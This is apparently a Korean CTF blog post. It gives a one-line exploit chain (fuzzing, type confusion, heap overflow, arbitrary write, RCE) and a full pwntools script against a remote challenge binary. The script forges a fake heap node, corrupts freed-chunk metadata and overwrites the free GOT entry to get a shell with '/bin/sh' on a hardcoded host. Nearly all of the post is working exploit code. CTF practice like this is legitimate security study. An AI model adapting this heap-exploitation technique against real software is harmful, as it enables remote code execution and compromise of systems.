Fuzzing with AFL -> Awesome crash -> Type confusion -> Heap Overflow ->AAW -> RCE
from pwn import *
def go(a,b):
p.recvuntil(str(a))
p.sendline(str(b))
def add(pred):
go(">",'1')
go(">",pred)
def link(pred,succ):
go(">",'2')
go(">",pred)
go('>',succ)
#payload = open("null").read()
#print(payload.encode('hex'))
payload =b"""5
E23
7
1
E2
7
7?
4
%d
"""%(0x39)
##FAKE NODE #####
payload+=p64(0xdead)#find id
payload+=p64(0x22)
payload+=p64(0x33)#linked pointer
payload+=p64(0x44)
payload+=p64(0x55)
payload+=p64(0xdeadbeef) #text size
payload+=p64(0x0)#text idx
#################
payload+=b"""
5
E23
"""
#### command with fake node ###
payload+=b"""4
%d
"""%0xdead
#p= process('dual-2df8d4005c5d4ffc03183a96a5d9cb55ac4ee56dfb589d65b0bf4501a586a4b0')
p = remote("13.231.226.137", 9573)
cmd = "set $pool = 0x519170\n"
#cmd+="b find_node\n"
#cmd+="b *0x040468B \n" #find_node -> compare
#cmd+="b *0x000000404D5C \n" #write_text -> call find_node
#cmd+="b *0x404CB4\n" #break new in write_text
#cmd+="b *0x0404CEB \n" #break free in write_text
cmd+="b *0x044B95A \n"
cmd+="c\n"
#gdb.attach(p,cmd)
p.send(payload)
payload = b"\x00"*(0x68+0x78)
payload+=b"a"*(0x70-0x23-0x8)
payload+=p64(0x21)#freed chunk's meta data
payload+=b"c"*(0x23-8)
payload+=p64(0x21)
payload+=p64(0x0519068) #free GOT
p.sendline("%d"%(len(payload)+1))
p.sendline(payload)
p.sendline("4")
p.sendline("0")#idx
p.sendline("20")
p.sendline("a"*19)
p.sendline("4")
p.sendline("0")
p.sendline("24")
payload = p64(0x044B95A)
payload = payload.ljust(23)
p.sendline(payload)
p.sendline("/bin/sh")
p.interactive()'PWN' 카테고리의 다른 글
| Ida python for bug hunting (0) | 2021.03.11 |
|---|---|
| Assaultcube Fuzzing (0) | 2021.02.04 |
| 사이버작전경연대회 2020 / vaccinesimulator (0) | 2020.09.15 |
| pwnable.kr / crcgen (0) | 2020.07.16 |
| ASIS CTF 2020 / shared_house (0) | 2020.07.08 |
